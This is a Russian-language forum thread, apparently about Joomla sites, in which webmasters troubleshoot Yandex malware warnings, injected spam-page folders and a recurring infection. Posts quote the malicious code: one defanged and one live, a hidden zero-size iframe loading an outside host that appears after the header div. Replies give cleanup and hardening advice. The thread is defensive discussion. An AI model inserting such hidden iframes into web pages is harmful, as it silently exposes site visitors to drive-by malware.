Вирус

Статус
В этой теме нельзя размещать новые ответы.
Посмотрел, ничего подозрительного не нашёл.
В выдаче яндекса тоже нормально отображается уже, без предупреждений.

Пришло уже письмо от яндекса, что повторная проверка не обнаружила вредоносного кода. Но все равно спасибо.

Почти наверняка вирус был в блоке тизеров, частенько рекламодатели подсовывают эту дрянь.

Я тоже так думал, только вот непонятно в каком и почему тогда одна страница. Их система даже не пишет кусок кода из-за которого она решила, что там вирус. Я им писал по этому поводу, обещали разобраться, но вот пришло автоматическое письмо. Не знаю, ответят ли они сами что, по этому поводу.
 
Спасибо. Нашел. SITEGUARD называется, если кому надо. Интересный сервис, а главное бесплатный.
 
еще RSFirewall поставь себе) вредные .js & .php скрипты автоматом блокирует! очень помогает в безопасности сайта) найдешь на форуме)
 
особо нет! главное лишнее там не щелкать) сейчас руссификацию делаю! как закончу - выложу)
 
Вирусяга прицепился, на хосте 2 сайта, у одного сайта в папке media создалась папка content, на другом сайте в папке libraries создалась папка ru.
В этих созданных папках прям мини сайты целый, текстовые файлы с описанием порно сайтов и куча страниц, скриптов которые все это дело обрабатывают, самое интересное со страничками ошибки 404, rss, Favicon, файликом роботс.тхт и т.д. Прям удивился при видя всего этого.:)
К каждому сайту прицепилось примерно 3600 проиндексированных яндексом страниц, один сайт полностью выпал из индексации.
Хранил пароли в коммандере, больше так рисковать не буду. Пароли поменял, все удалил, в роботс.тхт прописал, чтоб системные файлы не индексировались, кстати он с сайтов исчез! Сейчас записал обратно.
Еще удалил <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> из хедера, читал, что вроде как по нему ищут джумлавские сайты.
отредактировать файл head.php находиться /libraries/joomla/document/html/renderer/head.php
Открыв его находим код (район 83 строки)
$strHtml .= $tab.'<meta name="generator" content="'.$document->getGenerator().'" />'.$lnEnd;
удалить
 
Товарищи! Я снова с этой же проблемой. Яндекс уже 3 раз пишет, что у меня на сайте вирус. После второго раза, я внось написал им письмо и получил ответ.
В настоящий момент с Вашим сайтом все в порядке, пометка в выдаче снялась, проверьте, пожалуйста. Задержка была вызвана техническими проблемами с нашей стороны, приносим свои искренние извинения за доставленные неудобства.

Вредоносный код, обнаруженный на сайте, был прописан после элемента <div id="header-wrapper">, и выглядел следующим образом:

[iframe src="h**p://abrabr.co.cc/f/jldtjuc.php?n=24234" width="0" height="0" frameborder="0"></iframe][div id="header"]

Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах script изменены во избежание случайного срабатывания кода.


Но самое интерсное, что я на сайте ничего не менял. Только вот после этого раза начал реагировать мой антивирус, но не всегда. Около 5 раз такое было. Антивирус на сайт конечно же не пускал. Поэтому исходный код я глянуть не мог. Но после обновления страницы все было ок. Вирус прям какой-то динамический.

Вот скрин антивируса

Как найти этот gzip?
 
При первом заходе на сайт в коде появилось вот это:
Код:
...<div id="header-wrapper"><iframe src="http://firezilla.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><div id="header"><div class="top">...
После обновления страницы пропало.
Так что исходники определённо заражены.
 
При первом заходе на сайт в коде появилось вот это:
Код:
...<div id="header-wrapper"><iframe src="http://firezilla.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><div id="header"><div class="top">...
После обновления страницы пропало.
Так что исходники определённо заражены.
И как это вылечить или исправить?
 
Имхо, самый надёжный способ - залить чистый движок из бэкапа.
 
И как это вылечить или исправить?
Я бы проверил - что в этом диве прописано в шаблоне. Из воздуха ифрейм возникнуть не может, наверняка в индексном файле шаблона ( а судя по названию дива - скорее всего именно там) есть или позиция для модуля, или закриптованный код, или ифрейм в чистом виде.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху